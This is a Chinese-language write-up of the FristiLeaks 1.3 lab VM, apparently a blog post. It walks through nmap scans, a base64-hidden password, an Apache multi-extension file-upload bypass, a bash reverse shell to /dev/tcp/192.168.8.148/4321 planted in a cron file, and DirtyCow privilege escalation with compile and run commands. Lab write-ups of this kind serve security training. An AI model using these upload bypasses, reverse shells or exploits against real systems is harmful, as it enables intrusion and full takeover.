靶機提示

base64解碼提取圖片 文件上傳之apache多后綴名解析漏洞 linpeas dirtycow提權

靶機下載

通過網盤分享的文件：FristiLeaks_1.3.ova
鏈接: https://pan.baidu.com/s/1ZWznp8egNGwnQqwh1gkSZg?pwd=wwvp 提取碼: wwvp 
--來自百度網盤超級會員v8的分享

主機發現

nmap -sn 192.168.8.0/24

端口掃描

tcp

只開了一個80端口，很少見

nmap -sT --min-rate 10000 -p- 192.168.8.177 

udp

沒有開任何端口，看來只能盯著80端口打了

nmap -sU --top-ports=100 192.168.8.177

目錄掃描

發現了robots.txt，嘗試了一些目錄掃描但是都沒有發現可以深入的信息

dirb http://192.168.8.177

來點腦洞

ps:個人這邊沒有想到這個目錄，掃了n遍目錄，還在考慮圖片隱寫的問題。。。

提示去找url入口，也就是尋找目標目錄，一般來說這個目錄就很難用目錄掃描出來。聯想到首頁幾個超級大的字母，以及靶機名字，推測出目錄為fristi

首頁是個

入口

web滲透

查看前端源碼
有一個tips，還有用戶名

還有一段base64

base64解碼提取

echo "iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==" |base64 -d > 1.png

是個圖片

嘗試登錄

eezeepz/keKkeKKeKKeKkEkkEk

成功登錄

文件上傳漏洞

準備好反彈shell木馬

白名單過濾

發現是白名單過濾,這個防護等級是比較高的，一般只有遇到apache幾個解析漏洞才能繞過

apache換行解析漏洞

這個漏洞是配置不當導致的

<FilesMatch \.php$>SetHandler application/x-httpd-php
</FilesMatch>

前三行代碼：將所有.php結尾的文件當做php文件進行解析。
$：正則表達式匹配字符串結束位置，若存在換行，則匹配換行符為結尾。這導致在上傳時，添加一個換行符也能被正常解析，并且能夠繞過系統的黑名單檢測
利用$和換行符可以繞過黑名單機制。

上傳evil.php/x0A,放行數據包，訪問上傳的文件，要加%0A

apache多后綴解析漏洞

形成原因：配置apache時，對于apache配置不熟練，配置命令不清楚，在配置PHP文件處理程序時，配置命令存在問題：位于漏洞環境目錄的 conf/docker-php.conf里的配置命令（AddHandler application/x-httpd-php .php），該命令會將后綴中只要含有.php的文件都會被處理程序解析，這導致攻擊者可通過多后綴繞過文件上傳限制以.php結尾的機制，并使之被處理程序執行。

上傳圖片馬

我們上傳2.php.png,apache服務器看到有php結尾就會解析

訪問2.php.png.成功反彈shell

橫向滲透

敏感信息搜集

進入用戶eezeepz的家目錄，發現一個notes文件，提示/tmp有一個定時任務,每分鐘執行一次runthis文件里面命令

寫入反彈shell命令，但是沒有反彈

/bin/bash -i >& /dev/tcp/192.168.8.148/4321 0>&1

臟牛提權

定時任務一直不執行反彈shell的命令，嘗試一下linpeas,看看能不能臟牛提權

全稱為Linux Privilege Escalation Awesome Script，是?個?來搜索類unix主機上可能
的提權路徑的?動化腳本。
Github：https://github.com/carlospolop/privilege-escalation-awesome
scripts-suite/tree/master/linPEAS

攻擊機開啟文件服務

python -m http.server 8000

靶機下載linpeas.sh

linpeas啟動

果然有臟牛提權漏洞

一般用40839.c

傳輸到靶機上

編譯腳本提權

查看腳本用法

head -n 30 40839.c

按部就班提權

gcc -pthread 40839.c -o 40839 -lcrypt./40839 123456su firefart

提權

靶機總結

這臺靶機入口找了半天，純純ctf腦洞題。。。很難想到入口是fristi,還在那邊弄圖片隱寫，分析了半天。

但是入口進來之后，考了一個比較基礎的base64解碼；另外還考了一個文件上傳的漏洞，這個apache多后綴名解析的漏洞，實戰中確實是遇到過的，很有價值

最后提權部分，定時任務一直不能反彈shell,也弄了半天。。。，沒有找到原因；但是臟牛提權還是很順利的，這個技能需要熟練掌握